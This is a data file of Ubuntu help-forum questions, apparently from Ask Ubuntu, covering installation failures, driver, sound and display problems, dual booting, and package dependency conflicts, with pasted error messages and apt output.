407822	problem installing microsemi liberosoc on ubuntu	i asked this question on the electronic engineering stackexchange but could not find the right answer and the question was closed as it was flagged unrelated . i am trying to install the latest version of the libero sw tools set from microsemi/actel on my ubuntu laptop . the web site of the company says that their sw only supports the rh linux and they do n't mention ubuntu anywhere on their site . but i only have access to ubuntu and therefore need to find a way to install it so i can work on my project . i have followed the instruction of microsemi and installed all the necessary libraries before running the installation program , but i still ca n't get this to work . does anyone knows if sw for rh can be installed on ubuntu ? do i need to add extra libraries that are not part of current installation i have ? my installation is `` linux 3.8.0.32-generic x86_64 '' thanks in advance for your help . first i could not install it at all , but after i installed some fonts as i found from the following line , i got a bit further and got the following error message : preparing to install ... extracting the jre from the installer archive ... unpacking the jre ... extracting the installation resources from the installer archive ... configuring the installer for this system 's environment ... strings : '/lib/libc.so.6 ' : no such file launching installer ... graphical installers are not supported by the vm . the console mode will be used instead ... invocation of this java application has caused an invocationtargetexception . this application will now exit . ( lax ) /lib/libc.so.6 after i searched for it i found it under multiple locations on my installation sudo find / -name `` libc.so.6 '' /lib/x86_64-linux-gnu/libc.so.6 /lib/i386-linux-gnu/libc.so.6 /lib32/libc.so.6 and then created a link to fix that : sudo ln -s /lib/i386-linux-gnu/libc.so.6 /lib/libc.so.6 now i am going further in the installation , but it still not evne starting the installation ! this is the last error i am getting : launching installer ... graphical installers are not supported by the vm . the console mode will be used instead ... invocation of this java application has caused an invocationtargetexception . this application will now exit . ( lax ) stack trace : java.lang.unsatisfiedlinkerror : /tmp/install.dir.10759/linux/resource/jre/lib/i386/xawt/libmawt.so : libxtst.so.6 : can not open shared object file : no such file or directory i am not an expert on linux , even thought i have pretty good basic knowledge but this is really stopping me from moving forward . really appreciate your help .
407826	problem installing wifi driver	i have connected my laptop via ethernet cable , when i try to install wifi driver via systemsetting , additional drivers it show error look in var/log/jockey.log this is jockey log file pls help http : //paste.ubuntu.com/6780956/
407827	no display , no tty after upgrade ( 13.10 )	my upgrade from 13.04 - > 13.10 was a fail , the upgrader stalled at dkms : install completed , apparently this is an issue with the broadcom wireless driver . i had to kill dpkg to continue the process again . after that i tried running dpkg -- configure -a and apt-get install which initially kept stalling at the same point as the upgrade . eventually i gave up and rebooted , and attempting those same commands says that everything is up to date . more importantly , i had issues starting x ( gnome-session error : undefined symbol g_type_class_adjust_private_offset ) . i gave up on nouveau and installed nvidia apt-get install nvidia-current ; nvidia-xorg but now when i startup i 'm prompted to a terminal login screen , and my keyboard is n't detected . x.org.0.log here : http : //pastebin.com/2rjkumj1 i tried booting from the live usb , but failsafex simply starts a black screen with a cursor ( no keyboard input accepted ) . log here : http : //pastebin.com/kuetrhux nvidia created an xorg.conf file for me : http : //pastebin.com/csxvwahk i 'm really , really not sure where to go from here or how to go about fixing this . any thoughts or advice is appreciated , thanks edit : this may be related , but when i try running dconf-editor i get the same error as earlier , dconf-editor : symbol lookup error : /usr/lib/x86_64-linux-gnu/libatspi.so.0 : undefined symbol : g_type_class_adjust_private_offset
407828	why do we need an ip address for a bridge ?	a bridge is a layer 2 network device . on physical bridges we only have an ip address for operation and maintenance . i 'm a little bit confused why we need in kvm an ip address for the bridge . i understand that the vm 's interface get 's an ip address and that the physical interface attached to the bridge has no ip address . this ensures that the vm 's ip address is visible to the outside . in an server environment , i would only use static ip addressing for the vm 's . let 's assume , i use static ip addressing for the vm 's , than why do i need an ip address on the bridge ?
407830	i ca n't install ubuntu no hdd found	hello guys i have problem with ubuntu 13.04.i ca n't install it.no hard driver found : i have installed windows 7 also i have 3 partition but i ca n't understand why ubuntu ca n't see those partition .
407831	should i change the motherboard ?	i 'm having trouble with this computer , it has lots of startup and boot problems , sometimes it does n't post , sometimes it does but it wo n't boot and it freezes/kernel panics , and i do n't really know what to do . after all the guides and troubleshooting forum threads i saw , i think the problem is the motherboard . now i can boot once every 2 times i try , but i always get hdio get identity failed for /dev/sda . the last time i booted , i got a long text screen similar to the kernel panic , except they were simple background processes i guess . first , i got : error : unexpectedly disconnected from boot status daemon ata_id [ 351 ] : hdio_get_identity failed for '/dev/sda ' : invalid argument and a lot of things i did n't understand . then , the ubuntu logo appeared on the normal violet background , with the orange and white dots below , and then again , white text on black screen , it froze with that text : could not write bytes : broken pipe and a lot of numeric codes with phrases like [ 78.697964 ] bug : unable to handle kernel paging request at 00100104 '' am i right ? is it a motherboard issue ? do i have to change my motherboard ? is it more convenient to change pc ?
407833	can not install shutter	i get this error when i try installing shutter : the following packages have unmet dependencies : $ sudo apt-get install -f shutter reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : shutter : depends : libxml-simple-perl but it is not going to be installed e : unable to correct problems , you have held broken packages . i checked out the other ask ubuntu thread but the solution mentions mirrors but he has not elaborated further .
407834	installing ubuntu 13.10 with uefi/secure boot enabled . dualboot with win 8.1	first of all : i am well aware of the following the existing thread on uefi , as well as the guide by rod smith , and i have read on the problem on various forums for maybe 10 hours ( 2 days ) , but could not find an answer to my question . i want to install ubuntu but i do not want to disable secure boot at any time during the installation process . is this possible ? i have an acer aspire v5-573g and windows8.1 installed . so far all my tries of even just launching a live-install from usb end in a black screen after choosing at the `` live- or full install to hdd '' screen . not sure if i am allowed to ask this , but would it help to take any other linux distribution ( fedora ) ? i never had a linux installation running , so any solutions that need massive linux knowlegde might not help me . i would still like to hear about them thou . : d thx in advance . also , i am well aware of the bad reputation of secure boot , but please just accept my wish to keep it activated all the time . ( lets say my employer forces me to ... )
407835	no sound in ubuntu 13.10	my computer does n't play any sounds . i 've tried to chown /run/user/1000/pulse and removed it . i 've killed pulseaudio and force-reloaded alsa . sound settings recognizes my soundcard . happens both internal and external speakers . /var/log/syslog has nothing related to alsa but following text multiple times and the later one twice . jan 19 18:54:56 aapo-aspire-3830t pulseaudio [ 7223 ] : [ pulseaudio ] pid.c : daemon already running . jan 19 18:48:24 aapo-aspire-3830t pulseaudio [ 11645 ] : [ pulseaudio ] pid.c : stale pid file , overwriting . alsamixer : pavucontrol : sound worked fine in this computer when using ubuntu 12.04 .
407836	no sound output with ubuntu 13.10 after changing drivers	i have previously get my sound to be working with this version after i follow the article here . but just after i change the driver at software and updates- > additional drivers to a proprietary drivers , the sound driver stop working . the problem persists even after i revert it back to the one which ubuntu recommend ( open source , tested ) . i tried to follow some of the help instructions given in other threads but they are not helpful . the driver which i change is advanced micro devices , inc. [ amd/ati ] : juniper xt [ radeon hd5770 ]
407839	chromecast - tab casting problem	just got chromecast and it is set up , working successfully for youtube and all the other `` optimized '' best supported stuff . but not the tab cast . when i attempt to use it i get the message lost connection to device - please check that your device is online . i 'm not exactly sure where to start looking into this . this is really holding me up , because streaming local movies was/is my main motivation for getting chromecast and it seems that running a media server and playing in my own browser is the way to go , at least until we get support for vlc or upnp streams . so frustrating that videos i do n't `` have '' can be played , but those that i do `` have '' ca n't be ! any ideas ? even suggestion towards what direction to further explore would be helpful . sorry if the question shows lack of research , but i am kind of at a loss . have googled it a little but as of yet failed to find anyone with a similar problem . other streams work so the iptables thing described here : how can i use chromecast does n't seem to be the issue . the tab caster does n't work at all and reports `` lost connection to device '' so my problem seems different from purely audio issues like this : no audio while tab casting with chromecast and chromium i am running chromium 31.0.1650.63 ubuntu 12.04 and i just got google cast ( https : //chrome.google.com/webstore/detail/google-cast/boadgeojelhgndaghljhdicfkmllpafd ? hl=en ) a few days ago so that 's got ta be current .
407841	ubuntu & silverlight	i have a business that runs 11 computers that only require 2 bits of extra ( i.e . other that the os ) software to work - a browser and ms silverlight i am currently running on xp but time is running out on that , windows 7 is supported to 2020 and therefore i face a bill of over âł1200 to upgrade . is there anyone out there that can provide me with a disc image of ubuntu and silverlight already installed and working or if it is not possible please let me know and if possible how much ?
407842	auto unmute on sleep	i 'm running ubuntu 12.04 ( with kde ) on a hp 6730b laptop . whenever my sound is muted and i suspend the computer , it auto-unmutes and plays the exit sound . this is very annoying since i 'm in a silent zone . any idea 's on how to fix this ?
407843	powermanagement & touchpad questions	i 'm a new ubuntu user , just installed about an hour ago . but the first thing i noticed is that there are basically no power management features in ubuntu for laptops ( or a lack of information ) , compared to win7 which this machine is pre-installed with . like when i unplug the brightness will automatically adjust to minimum because that 's how i want it when running on battery . or when the drive should turn off etc . second question is touchpad settings which does n't give me options to adjust scrolling speed , reverse scrolling , disable horizontal scroll etc . what are the recommendations for laptop users ? or was ubuntu the wrong choise for laptops ? packard bell : dot_se-333nc
407844	samsung ativ book 9 lite install problems	so i have an incredible amount of issues regarding installation of ubuntu on my laptop . first of all the installation disc on usb does boot , but just ends up ( after ubuntu logo ) to a command line interface saying live image or something does n't exist . even tried with virtual-box and same problem occurs . i did manage to install and boot from the netinstall , but then for some reason installed ubuntu studio and did n't always start the desktop after logging in . it just got stuck . but even so is there something wrong with the 64-bit 12.04 iso ? i also tried with 32bit , but it did n't boot it . i also have managed to install and boot debian which worked , but it also found the same problems as it did with the netinstall ubuntu . which was no wifi , ethernet only worked first time , debian complained about the driver for the graphics card not being present therefore not functioning properly . please help find drivers and all the stuff i need to get it working . i hate being stuck with windows .
407847	how to change mysql port number in ubuntu	how can i can change port number of mysql from 3306 to my choice of number ( 1023 ) in ubuntu 13.10 ? i tried by editing the port number in file : /etc/mysql/my.cnf . but after this change mysql does n't start . please guide me so i can fix this .
407851	install fedora over ubuntu partition ?	is there any way for me to install fedora over ubuntu in a partition i made ?
407852	how to get to bios using term ?	i 've been using ubuntu 12.04 for a month all worked fine . i used an ubuntu utility to clean up unnecessary files thinking it would be safe . now my keyboard will not work . computer is booting from hard drive so i ca n't boot from a disk to reinstall . i can use the onboard keyboard to type into terminal but do n't know how to set the bios to boot from a cd using the command line . any help is appreciated.i have tried to install different versions of ubuntu but computer will only load from the hard drive .
407853	ubuntu 13.04 hang problem when ever i press the chipset driver button such as display or sound button	i have just installed ubuntu 13.04 on my dell inspiron n5010 . whenever i press the display brightness button , the os hangs up
407854	ubuntu 12.04 lts - installing qt 4.8.5 and qt creator	i found the official guide about how to install qt 4.8.5 on ubuntu 12.04 but that approach requires building qt sdk ( which may take some time ) and setting everything manually . moreover i need also fulfil this requirements . later i need also install qt creator , but when i use a terminal : sudo apt-get install qtcreator it will also install qt 5 as a dependency and i get a big mess . how to install qt 4.8.5 and qt creator from terminal using apt-get ? or maybe exists some other way ?
407862	problem with networking	the network icon in top of my screen is connected to my wireless router , but firefox does n't work . when i inserted the address of a site in address bar of firefox the `` server not found '' page was appeared .
407865	how do i access an external wireless network hard drive	i could access a 1tb buffalo-link wireless drive with my old windows 7 laptop , and put a lot of media files on it . recently i bought a linux ubuntu laptop and have tried to access it with the network button but there is no sign of it .
407873	i am still having issues with gparted and partitioning this hdd	so a few people have already told me a few great answers that have sent me in the right directions but i am fairly new to linux so it is a bit difficult to me ) : . i have an acer that originally had ubuntu on it . i partitioned it ( didnt back it up like a jacka** ) however the windows booted up fine . now , however , it seems as though neither win7 , nor ubuntu want to boot . i have win7 in gparted set to my main partition as ntsf and it is taking up more space than ubuntu since i will primarily be using windows . someone told me that ubuntu needs to be set to an ext2 file system . after i apply the changes , is that all that i will need to do ? please help . i really need to finish this up quickly ) : i wish that i was more proficient in linux ) : oh and i am unable to boot into ubuntu now . i am only able to boot windows if i have a bootable disk in my cd/dvd drive . however , it says that both partitions are still there and functioning . this is what it looks like as of now ( i have no internet so pls excuse the photo )
407881	terminal bell not working as intended	i have got a terminal bell to work , but not as it should , it does work but not always . i mean , for example , in case i press tab when nothing is there for autocompletion , i would hear a terminal bell , sometimes . the echo -e `` \a '' does n't work . i mainly want it to work with weechat 's beep.pl script . edit i removed pcspkr from blacklist and enabled terminal bell option in terminal 's profile 's preferences
407883	installing ubuntu on a laptop with preinstalled windows 8 ( uefi ) with two hard drives	i have a samsung laptop with a 128gb ssd ( that has windows 8 preinstalled along with a recovery partition ) and a 750gb hdd wich i use manly for files and programs . i was wondering if i could partition the second hard drive ( d : / ) into two so i would have half of it for windows docs and programs and the other half to install ubuntu so i could dual boot . i stumbled upon this post wich mentions the process for windows xp and so i wanted to make sure i can do the same procedure for windows 8 ( conisdering i have a uefi motherboard )
407885	how do i reset my admin password	when i login , system accepts my password to use system . but , when i try to update software programs , system says `` manipulation error '' or something like that . went to login screen with ubuntu recovery mode and tried to reset password using mount -re , etc but says password unchanged . what am i doing wrong ?
407886	ubuntu 12.10 download	i want to download ubuntu 12.10 rather than 12.04 for my desktop pc , but i can not find any .iso image of this version on the ubuntu website . is there anywhere i can get it ?
407891	ca n't watch video -- screen goes dark	i am new to linux as of yesterday . i know nothing about it , but i am very excited to learn ! glad to be here ! i 've been running ubuntu 13.10 saucy salamander since yesterday and have n't had any problems at all until this morning when i tried to watch a video on youtube and could not help but notice that video no longer plays on this computer , but the screen simply goes dark for about a minute as soon as the video is loaded , then springs back to light -- and the video does not play at all . i am not surprised to see this at all , after all , this is the world of computers where everything goes wrong all the time for no apparent reason at all ! ; - ) anyway , i find this very strange , since i have n't changed any settings yet , and since it was working like a clock last night ! what 's up with this ?
407892	which ubuntu instead of vista	i have a dell studio 1735 laptop which came with windows vista home premium 32bit . i have been impressed today with a friends laptop running ubuntu , am i able to run it on my laptop ? do i need to delete windows first ? are there any key issues i should be aware of ?
407894	ubuntu on lg nexus 4	i am trying to install ubuntu on my nexus 4 and at the end of the proces i get the following messages : error : phablet-flash : command 'adb push /home/lilleplov/hentede filer/phablet-flash/imageupdates/pool/ubuntu-d089ad76802f5698cfb0acadfe9e441a56a5fbe3af6f0df4e099398910e84212.tar.xz /cache/recovery/ ' returned non-zero exit status 1 removing directory /tmp/tmp0vekbf removing directory /tmp/tmpt1htxn what does that mean ? i can then reboot the phone and come back to android . how do i get ubuntu to work ?
407897	why i ca n't install proprietary drivers ?	i am following this tutorial for installing bumblebee on my dell n5110 but i am getting this error when i reach the fourth step of the tutorial . what am i doing wrong or what else do i need to do ? the following packages have unmet dependencies : bumblebee-nvidia : depends : nvidia-driver but it is not installable or nvidia-glx but it is not installable or nvidia-kernel-dkms but it is not installable or nvidia-kernel-amd64 but it is not installable or nvidia-kernel-686-pae but it is not installable or nvidia-kernel-486 but it is not installable or nvidia but it is not installable or nvidia-current but it is not installable or nvidia-current-updates but it is not installable or nvidia-driver-binary but it is not installable or nvidia-304 but it is not installable or nvidia-304-updates but it is not installable or nvidia-experimental-304 but it is not installable or nvidia-310 but it is not installable or nvidia-310-updates but it is not installable or nvidia-experimental-310 but it is not installable or nvidia-313 but it is not installable or nvidia-313-updates but it is not installable or nvidia-experimental-313 but it is not installable or nvidia-319 but it is not installable or nvidia-319-updates but it is not installable or nvidia-experimental-319 but it is not installable or nvidia-325 but it is not installable or nvidia-325-updates but it is not installable or nvidia-experimental-325 but it is not installable or nvidia-331 but it is not installable or nvidia-331-updates but it is not installable or nvidia-experimental-331 but it is not installable e : unable to correct problems , you have held broken packages .
407901	getting just windows 8 ( no dual boot ) back from ubuntu ?	my acer v5 was originally windows 8 but i loaded ubuntu 13.04 and i think overwrote the windows 8 os . i have tried every way i could find to see if i could locate the windows 8 or acer erecovery management but was unable to find any tiny bit of them . is there any way to install one of them back and get windows 8 or do a factory reset that will reset it all the way back to when i got it ? i 'm not sure if the factory reset will just reset my ubuntu . i do n't want to dual boot , i just want windows 8 back , any help please ?
407902	installing ruby with rvm and making ruby visible to bash	i installed rvm according to the instructions from the official website . then i installed two ruby versions while rvm was visible to bash , ruby was not . i was browsing the web for a solution and i found the following command : after this , bash was able to see ruby . i ca n't understand how did this happen . from my perspective , the command was absolutely useless as i just installed the latest rvm version .
407905	custom launcher in application panel not working	i have created an app launcher for eclipse jee and eclipse c/c++ with alacarte . the `.desktop files have been created and i dragged the apps via the dash board on the launcher panel . but when clicking on them nothing happens ! ? here the .desktop file of one of them : # ! /usr/bin/env xdg-open [ desktop entry ] version=1.0 type=application terminal=false icon [ en_us ] =/home/dan/programs/eclipse_c/cdt_icon.png name [ en_us ] =eclipse c exec=~/programs/eclipse_c/eclipse_c comment [ en_us ] =eclipse c name=eclipse c comment=eclipse c icon=/home/dan/programs/eclipse_c/cdt_icon.png unil
407909	first time install and seems to be hung with `` reticulating spline '' message	first time install and seems to be hung with message on status bar saying `` reticulating spline '' . the mouse is not active . how long till i give up and shut it down by hand ?
407914	how to remove all packages ( libxcb1 ) that were used by xorg-edgers packages and install ubuntu 's packages ?	i have a problem with uninstalling packages that were used by xorg-edgers ' version of nvidia drivers that i have installed and after that removed ( 331.20 ) , e.g . : $ dpkg -l | grep libxcb ii libxcb-composite0 : amd64 1.10-1~xedgers~saucy1 amd64 x c binding , composite extension ii libxcb-dri2-0 : amd64 1.10-1~xedgers~saucy1 amd64 x c binding , dri2 extension ii libxcb-dri3-0 : amd64 1.10-1~xedgers~saucy1 amd64 x c binding , dri3 extension ii libxcb-glx0 : amd64 1.10-1~xedgers~saucy1 amd64 x c binding , glx extension ii libxcb-icccm4 : amd64 0.3.9-2 amd64 utility libraries for x c binding -- icccm ii libxcb-image0 : amd64 0.3.9-1ubuntu1 amd64 utility libraries for x c binding -- image ii libxcb-keysyms1 : amd64 0.3.9-1 amd64 utility libraries for x c binding -- keysyms ii libxcb-present0 : amd64 1.10-1~xedgers~saucy1 amd64 x c binding , present extension ii libxcb-randr0 : amd64 1.10-1~xedgers~saucy1 amd64 x c binding , randr extension ii libxcb-render-util0 : amd64 0.3.8-1.1 amd64 utility libraries for x c binding -- render-util ii libxcb-render0 : amd64 1.10-1~xedgers~saucy1 amd64 x c binding , render extension ii libxcb-shape0 : amd64 1.10-1~xedgers~saucy1 amd64 x c binding , shape extension ii libxcb-shm0 : amd64 1.10-1~xedgers~saucy1 amd64 x c binding , shm extension ii libxcb-sync0 : amd64 1.9.1-3ubuntu1 amd64 x c binding , sync extension ii libxcb-sync1 : amd64 1.10-1~xedgers~saucy1 amd64 x c binding , sync extension ii libxcb-util0 : amd64 0.3.8-2build1 amd64 utility libraries for x c binding -- atom , aux and event ii libxcb-xfixes0 : amd64 1.10-1~xedgers~saucy1 amd64 x c binding , xfixes extension ii libxcb-xv0 : amd64 1.10-1~xedgers~saucy1 amd64 x c binding , xv extension ii libxcb1 : amd64 1.10-1~xedgers~saucy1 amd64 x c binding that causes other problems with dependencies . therefore i would like to uninstall them , and install versions provided by ubuntu , e.g . : https : //launchpad.net/ubuntu/saucy/amd64/libxcb1/1.9.1-3ubuntu1 but when i try to remove them ( i may as well remove the whole system ) : $ sudo apt-get remove libxcb1 : amd64 reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : content-hub deluge-common extlinux fonts-texgyre gir1.2-gconf-2.0 gsettings-ubuntu-touch-schemas icoutils kate-data kde-runtime-data kdelibs5-data libandroid-properties1 libattica0.4 libboost-program-options1.53.0 libboost-python1.53.0 libc-ares2 libcontent-hub0 libcpufreq0 libdee-qt5-3 libdlrestrictions1 libepub0 libgflags2 libgfortran3 libgif4 libgoogle-glog0 libgsettings-qt1 libhardware2 libhud2 libhybris libhybris-common1 libkactivities6 libkdecore5 libkjsapi4 libkntlm4 libkonq5-templates libkpty4 liblapack3 libmedia1 libmikmod2 libmirclient3 libmirprotobuf0 libnepomukcleaner4 libntrack-qt4-1 libntrack0 libofono-qt1 libpam-ck-connector libportmidi0 libqapt2 libqdjango-db0 libqt5organizer5 libqt5qml-graphicaleffects libqt5systeminfo5 libqt5xmlpatterns5 libreoffice-l10n-en-gb libsmi2ldbl libsoprano4 libstreamanalyzer0 libstreams0 libsystemsettings1 libthreadweaver4 libtorrent-rasterbar7 libubuntu-application-api1 libubuntu-location-service0 libubuntu-platform-hardware-api1 libubuntudownloadmanager1 libunity-action-qt1 libunwind8 libupstart-app-launch1 libvirtodbc0 libwireshark-data libwireshark3 libwiretap3 libwsutil3 libzip2 nepomuk-core-data ntrack-module-libnl-0 odbcinst odbcinst1debian2 ofono oxygen-icon-theme p7zip-full powerd preview-latex-style ps2eps python-libtorrent python-numpy python3-gnupg python3-sip qtdeclarative5-dee-plugin qtdeclarative5-folderlistmodel-plugin qtdeclarative5-gsettings1.0 qtdeclarative5-systeminfo-plugin qtdeclarative5-unity-action-plugin qtdeclarative5-unity-notifications-plugin qtdeclarative5-xmllistmodel-plugin shared-desktop-ontologies soprano-daemon sqlite3 syslinux-themes-debian syslinux-themes-debian-wheezy system-image-common system-image-dbus tex-gyre ttf-marvosym ubuntu-download-manager ubuntu-mobile-icons ubuntu-touch-sounds ubuntu-ui-toolkit-theme unetbootin-translations usermetricsservice virtuoso-minimal virtuoso-opensource-6.1-bin virtuoso-opensource-6.1-common wireshark-common use 'apt-get autoremove ' to remove them . the following extra packages will be installed : docbook-xml docbook-xsl fonts-droid libencode-locale-perl libfile-listing-perl libfont-afm-perl libgpod4-nogtk libhtml-form-perl libhtml-format-perl libhtml-parser-perl libhtml-tagset-perl libhtml-tree-perl libhttp-cookies-perl libhttp-daemon-perl libhttp-date-perl libhttp-message-perl libhttp-negotiate-perl libio-html-perl liblwp-mediatypes-perl liblwp-protocol-https-perl libnet-http-perl librarian0 libwww-perl libwww-robotrules-perl libxml2-utils rarian-compat sgml-data unity-scope-video-remote suggested packages : docbook docbook-dsssl docbook-defguide dbtoepub docbook-xsl-doc-html docbook-xsl-doc-pdf docbook-xsl-doc-text docbook-xsl-doc docbook-xsl-saxon fop libsaxon-java libxalan2-java libxslthl-java xalan libdata-dump-perl libcrypt-ssleay-perl libauthen-ntlm-perl perlsgml w3-recs opensp the following packages will be removed : account-plugin-google activity-log-manager activity-log-manager-control-center appmenu-qt apport-gtk apturl at-spi2-core bamfdaemon baobab bluez-cups checkbox-qt clementine colord compiz compiz-core compiz-gnome compiz-plugins compiz-plugins-default compiz-plugins-extra compizconfig-settings-manager copyq cups dbus-x11 deja-dup deja-dup-backend-gvfs deluge deluge-gtk dropbox eog evince evolution-data-server evolution-data-server-goa fbmessenger file-roller firefox flashplugin-installer freerdp-x11 friends friends-dispatcher gconf2 gcr gedit ghostscript-x gimp gir1.2-appindicator3-0.1 gir1.2-atspi-2.0 gir1.2-gdata-0.0 gir1.2-gdkpixbuf-2.0 gir1.2-gnomebluetooth-1.0 gir1.2-goa-1.0 gir1.2-gtk-3.0 gir1.2-nautilus-3.0 gir1.2-notify-0.7 gir1.2-pango-1.0 gir1.2-peas-1.0 gir1.2-rb-3.0 gir1.2-totem-1.0 gir1.2-vte-2.90 gir1.2-webkit-3.0 gir1.2-wnck-3.0 gkbd-capplet gksu gnome-bluetooth gnome-calculator gnome-contacts gnome-control-center gnome-control-center-datetime gnome-control-center-signon gnome-control-center-unity gnome-disk-utility gnome-font-viewer gnome-icon-theme gnome-icon-theme-symbolic gnome-keyring gnome-mines gnome-power-manager gnome-screensaver gnome-screenshot gnome-session gnome-session-bin gnome-session-canberra gnome-settings-daemon gnome-sudoku gnome-system-log gnome-system-monitor gnome-terminal gnome-terminal-data gnome-user-guide gnome-user-share gnomine google-chrome-stable grub-customizer gstreamer0.10-plugins-bad gstreamer0.10-plugins-good gstreamer0.10-pulseaudio gstreamer0.10-x gstreamer1.0-clutter gstreamer1.0-plugins-bad gstreamer1.0-plugins-good gstreamer1.0-pulseaudio gstreamer1.0-x gtk2-engines-murrine gtk3-engines-unico gucharmap gvfs gvfs-backends gvfs-daemons gvfs-fuse hplip hud humanity-icon-theme ibus ibus-gtk ibus-gtk3 ibus-pinyin ibus-table imagemagick indicator-application indicator-appmenu indicator-bluetooth indicator-cpufreq indicator-keyboard indicator-multiload indicator-printers indicator-session indicator-sound indicator-sync intel-gpu-tools landscape-client-ui-install language-selector-gnome latex-beamer latex-xcolor latexmk libaa1 libaccount-plugin-1.0-0 libaccount-plugin-generic-oauth libaccount-plugin-google libappindicator1 libappindicator3-1 libasound2-plugins libatk-adaptor libatk-bridge2.0-0 libatk-bridge2.0-dev libatspi2.0-0 libaudio2 libcairo-gobject2 libcairo-perl libcairo2 libcairomm-1.0-1 libcanberra-gtk-module libcanberra-gtk0 libcanberra-gtk3-0 libcanberra-gtk3-module libcanberra-pulse libcheese-gtk23 libcheese7 libclutter-1.0-0 libclutter-gst-2.0-0 libclutter-gtk-1.0-0 libcogl-pango12 libcogl12 libcompizconfig0 libdbusmenu-gtk3-4 libdbusmenu-gtk4 libdbusmenu-qt2 libdecoration0 libdmapsharing-3.0-2 libegl1-mesa libegl1-mesa-drivers libespeak1 libevdocument3-4 libevview3-3 libfarstream-0.1-0 libfarstream-0.2-2 libfluidsynth1 libfolks-eds25 libframe6 libfreerdp-plugins-standard libfreerdp1 libfriends0 libgail-3-0 libgail-common libgail18 libgbm1 libgcr-3-1 libgcr-ui-3-1 libgd3 libgdata13 libgdk-pixbuf2.0-0 libgegl-0.2-0 libgeis1 libgimp2.0 libgksu2-0 libgl1-mesa-glx libglade2-0 libglamor0 libglew1.8 libglewmx1.8 libglu1-mesa libgnome-bluetooth11 libgnome-control-center1 libgnome-desktop-3-7 libgnomekbd8 libgoa-1.0-0 libgphoto2-6 libgpod4 libgrail6 libgrip0 libgstreamer-plugins-bad1.0-0 libgtk-3-0 libgtk-3-bin libgtk2-perl libgtk2.0-0 libgtk2.0-bin libgtkmm-3.0-1 libgtksourceview-3.0-1 libgucharmap-2-90-7 libgweather-3-3 libgxps2 libido3-0.1-0 libindicator3-7 libindicator7 liblightdm-gobject-1-0 libmagickcore5 libmagickcore5-extra libmagickwand5 libmetacity-private0a libnautilus-extension1a libnm-gtk0 libnotify-bin libnotify4 libnux-4.0-0 libpam-freerdp libpango-perl libpango1.0-0 libpangocairo-1.0-0 libpangomm-1.4-1 libpangox-1.0-0 libpangoxft-1.0-0 libpeas-1.0-0 libphonon4 libpocketsphinx1 libpoppler-glib8 libpulse-mainloop-glib0 libpulse0 libpulsedsp libpurple0 libqt4-declarative libqt4-designer libqt4-help libqt4-opengl libqt4-scripttools libqt4-svg libqt53d5 libqt5gui5 libqt5location5 libqt5opengl5 libqt5printsupport5 libqt5quick5 libqt5webkit5 libqt5widgets5 libqtgui4 libqtwebkit4 libreoffice-base-core libreoffice-calc libreoffice-core libreoffice-draw libreoffice-gnome libreoffice-gtk libreoffice-help-en-gb libreoffice-help-en-us libreoffice-impress libreoffice-math libreoffice-ogltrans libreoffice-pdfimport libreoffice-presentation-minimizer libreoffice-writer librhythmbox-core7 librsvg2-2 librsvg2-common libsane libsdl-image1.2 libsdl-mixer1.2 libsdl-ttf2.0-0 libsdl1.2debian libsmpeg0 libsphinxbase1 libstartup-notification0 libt1-5 libtelepathy-farstream3 libtimezonemap1 libtotem0 libufe-xidgetter0 libunity-core-6.0-8 libunity-gtk2-parser0 libunity-gtk3-parser0 libunity-misc4 libunity-webapps0 libva-x11-1 libvdpau1 libvisual-0.4-plugins libvte-2.90-9 libwebkitgtk-1.0-0 libwebkitgtk-3.0-0 libwmf0.2-7 libwmf0.2-7-gtk libwnck-3-0 libwnck22 libx11-6 libxaw7 libxcb-composite0 libxcb-dri2-0 libxcb-dri3-0 libxcb-glx0 libxcb-icccm4 libxcb-image0 libxcb-keysyms1 libxcb-present0 libxcb-randr0 libxcb-render-util0 libxcb-render0 libxcb-shape0 libxcb-shm0 libxcb-sync0 libxcb-sync1 libxcb-util0 libxcb-xfixes0 libxcb-xv0 libxcb1 libxcomposite1 libxcursor1 libxdamage1 libxext6 libxfixes3 libxft2 libxi6 libxinerama1 libxkbfile1 libxklavier16 libxmu6 libxmuu1 libxp6 libxpm4 libxrandr2 libxrender1 libxres1 libxss1 libxt6 libxtst6 libxv1 libxvmc1 libxxf86dga1 libxxf86vm1 libyelp0 libzbar0 light-themes lightdm lightdm-remote-session-freerdp lightdm-remote-session-uccsconfigure luatex mousetweaks mythes-en-us nautilus nautilus-image-tools nautilus-sendto nautilus-share network-manager-gnome network-manager-openvpn-gnome network-manager-pptp-gnome notify-osd nux-tools nvidia-319-updates nvidia-settings-319-updates obex-data-server onboard onboard-data oneconf overlay-scrollbar overlay-scrollbar-gtk2 overlay-scrollbar-gtk3 pgf phonon phonon-backend-gstreamer plymouth-label plymouth-theme-ubuntu-logo policykit-1-gnome poppler-utils printer-driver-gutenprint printer-driver-hpcups printer-driver-postscript-hp prosper pulseaudio pulseaudio-module-bluetooth pulseaudio-module-x11 pulseaudio-utils python-appindicator python-aptdaemon.gtk3widgets python-cairo python-compizconfig python-gi-cairo python-glade2 python-gnomekeyring python-gtk2 python-nautilus python-notify python-pygame python-qt4 python-ubuntu-sso-client python3-aptdaemon.gtk3widgets python3-cairo python3-gi-cairo python3-pyatspi python3-pyqt4 python3-pyqt4.phonon python3-uno qt-at-spi remmina remmina-plugin-rdp remmina-plugin-vnc sane-utils screen-resolution-extra seahorse sessioninstaller shotwell signon-plugin-oauth2 signon-ui simple-scan sni-qt software-center software-properties-gtk ssh-askpass-gnome steam-launcher system-config-printer-gnome telepathy-haze telepathy-indicator texlive texlive-base texlive-binaries texlive-extra-utils texlive-font-utils texlive-fonts-recommended texlive-fonts-recommended-doc texlive-generic-recommended texlive-latex-base texlive-latex-base-doc texlive-latex-extra texlive-latex-extra-doc texlive-latex-recommended texlive-latex-recommended-doc texlive-luatex texlive-pictures texlive-pictures-doc texlive-pstricks texlive-pstricks-doc tipa tk8.6 tk8.6-lib ubuntu-artwork ubuntu-desktop ubuntu-docs ubuntu-mono ubuntu-release-upgrader-gtk ubuntu-sso-client ubuntu-tweak unetbootin unity unity-asset-pool unity-greeter unity-gtk2-module unity-gtk3-module unity-lens-applications unity-scope-calculator unity-scope-manpages unity-services unity-tweak-tool unity-webapps-common unity-webapps-service update-manager update-notifier usb-creator-gtk vino vlc vlc-plugin-notify vlc-plugin-pulse wireshark x11-apps x11-session-utils x11-utils x11-xfs-utils 